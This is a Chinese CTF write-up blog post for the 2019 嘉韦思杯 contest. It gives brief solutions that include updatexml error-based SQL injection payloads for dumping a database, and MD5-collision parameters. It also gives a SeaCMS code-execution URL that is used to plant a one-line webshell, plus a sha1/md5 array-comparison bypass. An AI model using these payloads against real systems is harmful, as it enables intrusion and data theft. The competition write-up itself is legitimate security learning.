美文网首页CTF练习
[嘉韦思杯]——WP

[嘉韦思杯]——WP

作者: lokisteven | 来源:发表于2019-03-30 22:12 被阅读86次

由于时间关系大部分我只给出解题过程,图就不贴了

1

试了一下发现union 不行,那就试试
报错注入:
and 1=(updatexml(1,concat(0x3a,(select database())),1)) #
发现爆库成功!
and 1=(updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)) #
爆表成功!
and 1=(updatexml(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name='flag')),1)) #
爆列成功!
and 1=(updatexml(1,concat(0x3a,(select group_concat(flag) from flag)),1)) #

2

进入页面,发现被base64了,解码后,发现是JS加密,放入控制台得到flag

3

频谱转换发现flag:....(一串字符) 但这并不是真正的flag,至于真正的flag我也没找到

4

Base64很明显,我们只需一直解码即可,每组字数为5 图片.png

5

。。。。

6

要计算,正则,得py得天下


图片.png
图片.png

7

。。。

8

你能解开这段密文吗?
ASCII差值
根据密文:
s——{
Z——c
*——4
Z——e
g——s
'——4
d——r
b——f
g——l
[——a
`——g

9

。。。

10

。。。

11

抓包 发现隐藏的代码 图片.png

这串呢?一上来就把你传的参数转化为string类型,所以用数组的方法是不行了。
只能是MD5碰撞了,就是不相同的字符恰好有着一样的MD5。fastcoll_v1.0.0.5.exe工具可以给弄出来。
但是别忘了url
param1=%D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%16%B4%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%DC%9F%95ab%D2%09P%A1%5D%12%3B%1ETZ%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29%EF%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%1E%7Ch%B0%96%A7%E5U%EBn1q%CA%D0%8B%C7%1BSP&param2=%D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%164%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%5C%A0%95ab%D2%09P%A1%5D%12%3B%1ET%DA%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29o%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%9E%7Bh%B0%96%A7%E5U%EBn1q%CA%D0%0B%C7%1BSP


图片.png

12

。。。

13

逆序解码base64,发现是1,

14

发现是海洋CMS漏洞
搜索漏洞找了一个版本的
构造payload
http://47.103.43.235:84/search.php?searchtype=5&searchword=%7Bif%7Bsearchpage:year%7D&year=:e%7Bsearchpage:area%7D%7D&area=v%7Bsearchpage:letter%7D&letter=al%7Bsearchpage:lang%7D&yuyan=(join%7Bsearchpage:jq%7D&jq=($_P%7Bsearchpage:ver%7D&&ver=OST%5B9%5D))
上传一句话,菜刀连接,

图片.png
图片.png
根目录下发现flag文件

15

图片.png
抓包发现,我们打开发现 图片.png

分析代码逻辑,发现POST了两个字段name和password,获得flag要求的条件是:name != password & sha1(name) == sha1(password),乍看起来这是不可能的,其实可以利用sha1()函数的漏洞来绕过。如果把这两个字段构造为数组,如:?name[]=a&password[]=b,这样在第一处判断时两数组确实是不同的,但在第二处判断时由于sha1()函数无法处理数组类型,将报错并返回false,if 条件成立,获得flag。
经验证md5()函数同样存在此漏洞。

相关文章

  • [嘉韦思杯]——WP

    由于时间关系大部分我只给出解题过程,图就不贴了 1 试了一下发现union 不行,那就试试报错注入:and 1=(...

  • 2019年上海“嘉韦思杯”WP

    土肥原贤二 题目地址: 1‘order by 1,2,3,4 #1' union select 1,2,3,4 #...

  • 红帽杯部分Wp

    Crypto rsa systemwriteup 拿到代码,粗略一看,嗯首先有个len为38的flag,另这个fl...

  • 十二丞相~~韦思谦

    韦思谦 611-689 本 名:韦仁约 别 称:韦思谦 字 号:字思谦 所处时代:唐代 民族族群:唐人 出生地:河...

  • 网鼎杯blend wp

    记录一次菜的抠脚的学习过程 题目是一个bin文件,首先通过file命令看一下文件格式 拖到IDA Pro 可以识别...

  • 强网杯部分wp

    MISC-welcome 记事本打开发现文件头BM,改后缀bmp 扔stegsolve,analyse->ster...

  • 网鼎杯pwn WP

    前言 本周参加了两个比赛,一个是de1CTF,另一个是网鼎杯,把这两场比赛全部总结一下。 在网鼎杯中,有幸拿了一个...

  • 2018上海杯部分WP

    title: 2018上海杯WPdate: 2018-11-05 20:17:30tags: [WP] WEB-1...

  • 强网杯2019 wp

    膜大佬们太强了,弱小的我只能鞭尸强网先锋。 签到 直接提交 强网先锋-上单 进入页面http://49.4.15....

  • 天工杯2021 PWN WP

    看点:1.两个解法(shellcode、ROPchain)2.python3.9与pwntools的一个坑。 程序...

网友评论

    本文标题:[嘉韦思杯]——WP

    本文链接:https://www.haomeiwen.com/subject/jdesbqtx.html